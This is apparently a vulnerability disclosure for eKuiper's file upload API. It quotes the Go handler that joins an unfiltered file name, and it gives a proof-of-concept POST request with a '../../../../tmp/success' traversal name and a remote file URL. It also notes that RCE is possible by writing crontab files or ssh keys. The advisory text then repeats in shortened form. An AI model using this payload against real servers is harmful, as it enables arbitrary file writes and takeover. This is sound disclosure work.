Summary
Ekuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through ../. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.
Details
func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
switch r.Method {
// Upload or overwrite a file
case http.MethodPost:
switch r.Header.Get("Content-Type") {
case "application/json":
fc := &fileContent{}
defer r.Body.Close()
err := json.NewDecoder(r.Body).Decode(fc)
if err != nil {
handleError(w, err, "Invalid body: Error decoding file json", logger)
return
}
err = fc.Validate()
if err != nil {
handleError(w, err, "Invalid body: missing necessary field", logger)
return
}
filePath := filepath.Join(uploadDir, fc.Name)
err = upload(fc)
- The fc.Name parameter do not safely filtered.
PoC
POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89
{
"name": "../../../../tmp/success",
"file": "http://192.168.65.254:8888/success"
}
Impact
Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.
- SSRF
- Path-Travel
- May leads to RCE
The reporters is m0d9 from Tencent YunDing Lab.
yangbh Reporter
Summary
Ekuiper /config/uploads API supports accessing remote web URLs and saving files in the local upload directory, but there are no security restrictions, resulting in arbitrary file writing through ../. If run with root privileges, RCE can be achieved by writing crontab files or ssh keys.
Details
PoC
Impact
Tested and verified only on 1.14.3 and 1.14.1, theoretically all versions using this code could be affected.
The reporters is m0d9 from Tencent YunDing Lab.